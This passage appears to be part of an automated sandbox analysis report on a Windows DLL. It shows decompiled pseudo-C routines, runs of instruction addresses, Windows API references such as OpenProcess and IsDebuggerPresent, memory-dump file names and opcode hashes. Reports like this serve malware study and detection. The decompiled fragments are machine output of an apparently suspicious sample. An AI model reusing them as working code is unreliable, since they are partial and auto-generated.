                                                                                                                                                                                                                                                              							_t58 = _t81 - 1;
                                                                                                                                                                                                                                                              							__eflags = _t58;
                                                                                                                                                                                                                                                              							if(_t58 < 0) {
                                                                                                                                                                                                                                                              								L28:
                                                                                                                                                                                                                                                              								__eflags = _t81 - 0x10;
                                                                                                                                                                                                                                                              								if(_t81 < 0x10) {
                                                                                                                                                                                                                                                              									_t81 = _t81 + 1;
                                                                                                                                                                                                                                                              									__eflags = _t81;
                                                                                                                                                                                                                                                              									 *0x6e2041f8 = _t81;
                                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                                              								_t58 = _t81 - 1;
                                                                                                                                                                                                                                                              								goto L32;
                                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                                              								goto L25;
                                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                                              							while(1) {
                                                                                                                                                                                                                                                              								L25:
                                                                                                                                                                                                                                                              								__eflags =  *((intOrPtr*)(0x6e204200 + _t58 * 4)) - _t110;
                                                                                                                                                                                                                                                              								if( *((intOrPtr*)(0x6e204200 + _t58 * 4)) == _t110) {
                                                                                                                                                                                                                                                              									break;
                                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                                              								_t58 = _t58 - 1;
                                                                                                                                                                                                                                                              								__eflags = _t58;
                                                                                                                                                                                                                                                              								if(_t58 >= 0) {
                                                                                                                                                                                                                                                              									continue;
                                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                                              								break;
                                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                                              							__eflags = _t58;
                                                                                                                                                                                                                                                              							if(__eflags >= 0) {
                                                                                                                                                                                                                                                              								if(__eflags == 0) {
                                                                                                                                                                                                                                                              									goto L34;
                                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                                              								goto L32;
                                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                                              							goto L28;
                                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                                              						_t75 =  *((intOrPtr*)(_t108 - 8));
                                                                                                                                                                                                                                                              						__eflags = _t75 - _v8;
                                                                                                                                                                                                                                                              						if(_t75 < _v8) {
                                                                                                                                                                                                                                                              							goto L20;
                                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                                              						__eflags = _t75 - _t108;
                                                                                                                                                                                                                                                              						if(_t75 >= _t108) {
                                                                                                                                                                                                                                                              							goto L20;
                                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                                              						goto L15;
                                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                                              					L5:
                                                                                                                                                                                                                                                              					_t63 = 1;
                                                                                                                                                                                                                                                              					goto L60;
                                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                                              					goto L3;
                                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                                              			}




































                                                                                                                                                                                                                                                              0x6e20248f
                                                                                                                                                                                                                                                              0x6e202492
                                                                                                                                                                                                                                                              0x6e202498
                                                                                                                                                                                                                                                              0x6e2024b6
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e2024b6
                                                                                                                                                                                                                                                              0x6e2024a0
                                                                                                                                                                                                                                                              0x6e2024a9
                                                                                                                                                                                                                                                              0x6e2024af
                                                                                                                                                                                                                                                              0x6e2024be
                                                                                                                                                                                                                                                              0x6e2024c1
                                                                                                                                                                                                                                                              0x6e2024c4
                                                                                                                                                                                                                                                              0x6e2024ce
                                                                                                                                                                                                                                                              0x6e2024ce
                                                                                                                                                                                                                                                              0x6e2024d0
                                                                                                                                                                                                                                                              0x6e2024d3
                                                                                                                                                                                                                                                              0x6e2024d5
                                                                                                                                                                                                                                                              0x6e2024d5
                                                                                                                                                                                                                                                              0x6e2024d7
                                                                                                                                                                                                                                                              0x6e2024da
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e2024dc
                                                                                                                                                                                                                                                              0x6e2024de
                                                                                                                                                                                                                                                              0x6e202544
                                                                                                                                                                                                                                                              0x6e202544
                                                                                                                                                                                                                                                              0x6e2026a2
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e2026a2
                                                                                                                                                                                                                                                              0x6e2024e0
                                                                                                                                                                                                                                                              0x6e2024e0
                                                                                                                                                                                                                                                              0x6e2024e4
                                                                                                                                                                                                                                                              0x6e2024e6
                                                                                                                                                                                                                                                              0x6e2024e6
                                                                                                                                                                                                                                                              0x6e2024e6
                                                                                                                                                                                                                                                              0x6e2024e6
                                                                                                                                                                                                                                                              0x6e2024e9
                                                                                                                                                                                                                                                              0x6e2024ea
                                                                                                                                                                                                                                                              0x6e2024ed
                                                                                                                                                                                                                                                              0x6e2024ed
                                                                                                                                                                                                                                                              0x6e2024f1
                                                                                                                                                                                                                                                              0x6e2024f5
                                                                                                                                                                                                                                                              0x6e202503
                                                                                                                                                                                                                                                              0x6e202503
                                                                                                                                                                                                                                                              0x6e20250b
                                                                                                                                                                                                                                                              0x6e202511
                                                                                                                                                                                                                                                              0x6e202513
                                                                                                                                                                                                                                                              0x6e202515
                                                                                                                                                                                                                                                              0x6e202525
                                                                                                                                                                                                                                                              0x6e202532
                                                                                                                                                                                                                                                              0x6e202536
                                                                                                                                                                                                                                                              0x6e20253b
                                                                                                                                                                                                                                                              0x6e20253d
                                                                                                                                                                                                                                                              0x6e2025bb
                                                                                                                                                                                                                                                              0x6e2025bb
                                                                                                                                                                                                                                                              0x6e20253f
                                                                                                                                                                                                                                                              0x6e20253f
                                                                                                                                                                                                                                                              0x6e20253f
                                                                                                                                                                                                                                                              0x6e2025bd
                                                                                                                                                                                                                                                              0x6e2025bf
                                                                                                                                                                                                                                                              0x6e2026a0
                                                                                                                                                                                                                                                              0x6e2026a0
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e2025c5
                                                                                                                                                                                                                                                              0x6e2025c5
                                                                                                                                                                                                                                                              0x6e2025cc
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e2025d2
                                                                                                                                                                                                                                                              0x6e2025d6
                                                                                                                                                                                                                                                              0x6e202632
                                                                                                                                                                                                                                                              0x6e202634
                                                                                                                                                                                                                                                              0x6e20263c
                                                                                                                                                                                                                                                              0x6e20263e
                                                                                                                                                                                                                                                              0x6e202640
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e202642
                                                                                                                                                                                                                                                              0x6e202648
                                                                                                                                                                                                                                                              0x6e20264a
                                                                                                                                                                                                                                                              0x6e20264c
                                                                                                                                                                                                                                                              0x6e202661
                                                                                                                                                                                                                                                              0x6e202661
                                                                                                                                                                                                                                                              0x6e202663
                                                                                                                                                                                                                                                              0x6e202692
                                                                                                                                                                                                                                                              0x6e202699
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e202699
                                                                                                                                                                                                                                                              0x6e202667
                                                                                                                                                                                                                                                              0x6e202668
                                                                                                                                                                                                                                                              0x6e20266a
                                                                                                                                                                                                                                                              0x6e20266c
                                                                                                                                                                                                                                                              0x6e20266c
                                                                                                                                                                                                                                                              0x6e20266e
                                                                                                                                                                                                                                                              0x6e202670
                                                                                                                                                                                                                                                              0x6e202672
                                                                                                                                                                                                                                                              0x6e202686
                                                                                                                                                                                                                                                              0x6e202686
                                                                                                                                                                                                                                                              0x6e202689
                                                                                                                                                                                                                                                              0x6e20268b
                                                                                                                                                                                                                                                              0x6e20268b
                                                                                                                                                                                                                                                              0x6e20268c
                                                                                                                                                                                                                                                              0x6e20268c
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e202674
                                                                                                                                                                                                                                                              0x6e202674
                                                                                                                                                                                                                                                              0x6e202674
                                                                                                                                                                                                                                                              0x6e20267d
                                                                                                                                                                                                                                                              0x6e20267e
                                                                                                                                                                                                                                                              0x6e202680
                                                                                                                                                                                                                                                              0x6e202682
                                                                                                                                                                                                                                                              0x6e202682
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e202674
                                                                                                                                                                                                                                                              0x6e202672
                                                                                                                                                                                                                                                              0x6e20264e
                                                                                                                                                                                                                                                              0x6e202655
                                                                                                                                                                                                                                                              0x6e202655
                                                                                                                                                                                                                                                              0x6e202657
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e202659
                                                                                                                                                                                                                                                              0x6e20265a
                                                                                                                                                                                                                                                              0x6e20265d
                                                                                                                                                                                                                                                              0x6e20265f
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e20265f
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e202655
                                                                                                                                                                                                                                                              0x6e2025d8
                                                                                                                                                                                                                                                              0x6e2025db
                                                                                                                                                                                                                                                              0x6e2025e0
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e2025e9
                                                                                                                                                                                                                                                              0x6e2025eb
                                                                                                                                                                                                                                                              0x6e2025f1
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e2025f7
                                                                                                                                                                                                                                                              0x6e2025fd
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e202603
                                                                                                                                                                                                                                                              0x6e202605
                                                                                                                                                                                                                                                              0x6e20260e
                                                                                                                                                                                                                                                              0x6e202612
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e202618
                                                                                                                                                                                                                                                              0x6e20261b
                                                                                                                                                                                                                                                              0x6e20261d
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e202624
                                                                                                                                                                                                                                                              0x6e202626
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e202628
                                                                                                                                                                                                                                                              0x6e20262c
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e20262c
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e202517
                                                                                                                                                                                                                                                              0x6e202517
                                                                                                                                                                                                                                                              0x6e202517
                                                                                                                                                                                                                                                              0x6e20251e
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e202520
                                                                                                                                                                                                                                                              0x6e202521
                                                                                                                                                                                                                                                              0x6e202523
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e202523
                                                                                                                                                                                                                                                              0x6e20254b
                                                                                                                                                                                                                                                              0x6e20254d
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e20255d
                                                                                                                                                                                                                                                              0x6e20255f
                                                                                                                                                                                                                                                              0x6e202561
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e202567
                                                                                                                                                                                                                                                              0x6e20256e
                                                                                                                                                                                                                                                              0x6e20259a
                                                                                                                                                                                                                                                              0x6e20259a
                                                                                                                                                                                                                                                              0x6e20259c
                                                                                                                                                                                                                                                              0x6e20259e
                                                                                                                                                                                                                                                              0x6e2025b2
                                                                                                                                                                                                                                                              0x6e2025b4
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e2025a0
                                                                                                                                                                                                                                                              0x6e2025a0
                                                                                                                                                                                                                                                              0x6e2025a0
                                                                                                                                                                                                                                                              0x6e2025a9
                                                                                                                                                                                                                                                              0x6e2025aa
                                                                                                                                                                                                                                                              0x6e2025ac
                                                                                                                                                                                                                                                              0x6e2025ae
                                                                                                                                                                                                                                                              0x6e2025ae
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e2025a0
                                                                                                                                                                                                                                                              0x6e202570
                                                                                                                                                                                                                                                              0x6e202573
                                                                                                                                                                                                                                                              0x6e202575
                                                                                                                                                                                                                                                              0x6e202587
                                                                                                                                                                                                                                                              0x6e202587
                                                                                                                                                                                                                                                              0x6e20258a
                                                                                                                                                                                                                                                              0x6e20258c
                                                                                                                                                                                                                                                              0x6e20258c
                                                                                                                                                                                                                                                              0x6e20258d
                                                                                                                                                                                                                                                              0x6e20258d
                                                                                                                                                                                                                                                              0x6e202593
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e202577
                                                                                                                                                                                                                                                              0x6e202577
                                                                                                                                                                                                                                                              0x6e202577
                                                                                                                                                                                                                                                              0x6e20257e
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e202580
                                                                                                                                                                                                                                                              0x6e202580
                                                                                                                                                                                                                                                              0x6e202581
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e202581
                                                                                                                                                                                                                                                              0x6e202583
                                                                                                                                                                                                                                                              0x6e202585
                                                                                                                                                                                                                                                              0x6e202598
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e202598
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e202585
                                                                                                                                                                                                                                                              0x6e2024f7
                                                                                                                                                                                                                                                              0x6e2024fa
                                                                                                                                                                                                                                                              0x6e2024fd
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e2024ff
                                                                                                                                                                                                                                                              0x6e202501
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e202501
                                                                                                                                                                                                                                                              0x6e2024c6
                                                                                                                                                                                                                                                              0x6e2024c8
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 6E202536
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.472920396.000000006E201000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.472896080.000000006E200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.472934732.000000006E203000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.472952779.000000006E205000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.472968446.000000006E206000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: MemoryQueryVirtual
                                                                                                                                                                                                                                                              • String ID: @B n$@B n$@B n
                                                                                                                                                                                                                                                              • API String ID: 2850889275-3126468145
                                                                                                                                                                                                                                                              • Opcode ID: 86f46a2e9caeefc2a999a67b8af409545b82db6c7246ed0f0df1a05fb5364dcf
                                                                                                                                                                                                                                                              • Instruction ID: 6a21e0c664511740778f966bbbb358778dbe4c31d7e48aa62869721407b4cb8f
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 86f46a2e9caeefc2a999a67b8af409545b82db6c7246ed0f0df1a05fb5364dcf
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AB61E5B2B1460B8FDB4ACEA9C8A075977B7EB85315F24856BD815C72C6E730D882CA50
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                                              			E6E20146C() {
                                                                                                                                                                                                                                                              				void* _t1;
                                                                                                                                                                                                                                                              				long _t3;
                                                                                                                                                                                                                                                              				void* _t4;
                                                                                                                                                                                                                                                              				long _t5;
                                                                                                                                                                                                                                                              				void* _t6;
                                                                                                                                                                                                                                                              				intOrPtr _t8;
                                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                                              				_t8 =  *0x6e2041b0;
                                                                                                                                                                                                                                                              				_t1 = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                                                                                              				 *0x6e2041bc = _t1;
                                                                                                                                                                                                                                                              				if(_t1 == 0) {
                                                                                                                                                                                                                                                              					return GetLastError();
                                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                                              				_t3 = GetVersion();
                                                                                                                                                                                                                                                              				if(_t3 <= 5) {
                                                                                                                                                                                                                                                              					_t4 = 0x32;
                                                                                                                                                                                                                                                              					return _t4;
                                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                                              					 *0x6e2041ac = _t3;
                                                                                                                                                                                                                                                              					_t5 = GetCurrentProcessId();
                                                                                                                                                                                                                                                              					 *0x6e2041a8 = _t5;
                                                                                                                                                                                                                                                              					 *0x6e2041b0 = _t8;
                                                                                                                                                                                                                                                              					_t6 = OpenProcess(0x10047a, 0, _t5);
                                                                                                                                                                                                                                                              					 *0x6e2041a4 = _t6;
                                                                                                                                                                                                                                                              					if(_t6 == 0) {
                                                                                                                                                                                                                                                              						 *0x6e2041a4 =  *0x6e2041a4 | 0xffffffff;
                                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                                              					return 0;
                                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                                              			}









                                                                                                                                                                                                                                                              0x6e20146d
                                                                                                                                                                                                                                                              0x6e20147b
                                                                                                                                                                                                                                                              0x6e201483
                                                                                                                                                                                                                                                              0x6e201488
                                                                                                                                                                                                                                                              0x6e2014d2
                                                                                                                                                                                                                                                              0x6e2014d2
                                                                                                                                                                                                                                                              0x6e20148a
                                                                                                                                                                                                                                                              0x6e201492
                                                                                                                                                                                                                                                              0x6e2014ce
                                                                                                                                                                                                                                                              0x6e2014d0
                                                                                                                                                                                                                                                              0x6e201494
                                                                                                                                                                                                                                                              0x6e201494
                                                                                                                                                                                                                                                              0x6e201499
                                                                                                                                                                                                                                                              0x6e2014a7
                                                                                                                                                                                                                                                              0x6e2014ac
                                                                                                                                                                                                                                                              0x6e2014b2
                                                                                                                                                                                                                                                              0x6e2014ba
                                                                                                                                                                                                                                                              0x6e2014bf
                                                                                                                                                                                                                                                              0x6e2014c1
                                                                                                                                                                                                                                                              0x6e2014c1
                                                                                                                                                                                                                                                              0x6e2014cb
                                                                                                                                                                                                                                                              0x6e2014cb

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6E2017B8,74B063F0,00000000), ref: 6E20147B
                                                                                                                                                                                                                                                              • GetVersion.KERNEL32 ref: 6E20148A
                                                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 6E201499
                                                                                                                                                                                                                                                              • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6E2014B2
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.472920396.000000006E201000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.472896080.000000006E200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.472934732.000000006E203000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.472952779.000000006E205000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.472968446.000000006E206000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Process$CreateCurrentEventOpenVersion
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 845504543-0
                                                                                                                                                                                                                                                              • Opcode ID: 9ea6dd9fb0518d842827008a03f0f9dc9d112dcd8ba4289fd613778a436585e2
                                                                                                                                                                                                                                                              • Instruction ID: 869fde4940c31e366ebd44cf0076d2c46c0c8dc6f120fb0d63c1d2df83f5f8ee
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9ea6dd9fb0518d842827008a03f0f9dc9d112dcd8ba4289fd613778a436585e2
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F8F03071645A119FFF909FA9AC0DB457BA7B726721F18801EF155D91C0D7F04182CBB4
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000001), ref: 6E24A6E6
                                                                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000001), ref: 6E24A6F0
                                                                                                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(6E246BE1,?,?,?,?,?,00000001), ref: 6E24A6FD
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.472989158.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3906539128-0
                                                                                                                                                                                                                                                              • Opcode ID: 802a03b3bfebb1a4095dbc42eb8a6ae4dcbc1d8284c26b8cfb765284a7aeaa23
                                                                                                                                                                                                                                                              • Instruction ID: db529db68f986982cbcfb8efea9721602c0578a9cd829509c6abf9e133d401d8
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 802a03b3bfebb1a4095dbc42eb8a6ae4dcbc1d8284c26b8cfb765284a7aeaa23
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3B31F2B491122DDBCB65DF64C988BCCBBB9BF08310F5046EAE41CA7290E7709B858F54
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,?,6E24C28A,?,?,?,?,?,6E253E50), ref: 6E24C2AD
                                                                                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000,?,6E24C28A,?,?,?,?,?,6E253E50), ref: 6E24C2B4
                                                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 6E24C2C6
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.472989158.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1703294689-0
                                                                                                                                                                                                                                                              • Opcode ID: bfe7071c005132f4d0ecfd2a688dbfbc6a74c45cb7b056a28e9c284c22ccaafb
                                                                                                                                                                                                                                                              • Instruction ID: ed59db3db2b764053d4171ef5c536a85a3b9fe446abb8ab36d04abdd5e2c5f4a
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bfe7071c005132f4d0ecfd2a688dbfbc6a74c45cb7b056a28e9c284c22ccaafb
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6CE0867500050CFFDF015FE4CA0DA883F2FFF45642B004810F8158A220DB76D861CB90
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.472989158.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: d8c182849ccbed50c139c48f842e02fa15e35fca7807212bb1b4b6bfddac4a1b
                                                                                                                                                                                                                                                              • Instruction ID: 1760a0e70c4f27c00ef11e3ed118a901b5e0013d7661eec587d07cd1e7f04bd4
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d8c182849ccbed50c139c48f842e02fa15e35fca7807212bb1b4b6bfddac4a1b
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D2F12E71E0121ADFDB18CFA9C890A9EB7F6FF88314F158269D919AB344D771A901CF90
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6E257670,?,?,00000008,?,?,6E257308,00000000), ref: 6E2578A2
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.472989158.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ExceptionRaise
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3997070919-0
                                                                                                                                                                                                                                                              • Opcode ID: 730ca9c8023c5c5c6f989c7d975e311253b4b4fb593976b88ec98e9d94736412
                                                                                                                                                                                                                                                              • Instruction ID: 27d75484a39c07fd021faa4bc710df2d115daf3c7eae715c148e604caa4e77f4
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 730ca9c8023c5c5c6f989c7d975e311253b4b4fb593976b88ec98e9d94736412
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 88B1343526060A8FD744CF68C596B547BA2FB05365F25C698E8A9CF3E1C335E9A1CB40
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6E24769F
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.472989158.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: FeaturePresentProcessor
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2325560087-0
                                                                                                                                                                                                                                                              • Opcode ID: a3c6a37e9de070b9986264c9b395d9e2e3693c99eb86eadfb1bf7a11e3524093
                                                                                                                                                                                                                                                              • Instruction ID: ea9b52ede98c251322b58db1e104f78028ed95b47a403e777d51943c6192aab5
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a3c6a37e9de070b9986264c9b395d9e2e3693c99eb86eadfb1bf7a11e3524093
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D351C4B1D1160ACFEB09CFA5C585BAAB7F3FB49311F108529C425EB281E774A944CF61
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.472989158.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 36d84c581965489d8225b013a0cb56fc2b71ca4a0874aa09a1cbe9bd962a20d7
                                                                                                                                                                                                                                                              • Instruction ID: f1cc6de38dea618985cb1d781e4c23dcba73e65900ffded3b051f0196489fa00
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 36d84c581965489d8225b013a0cb56fc2b71ca4a0874aa09a1cbe9bd962a20d7
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8D4182B580561DAFDB508FA9CD88EEAB7BAEF45304F1446D9E41D93300EA359E94CF10
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Memory Dump Source
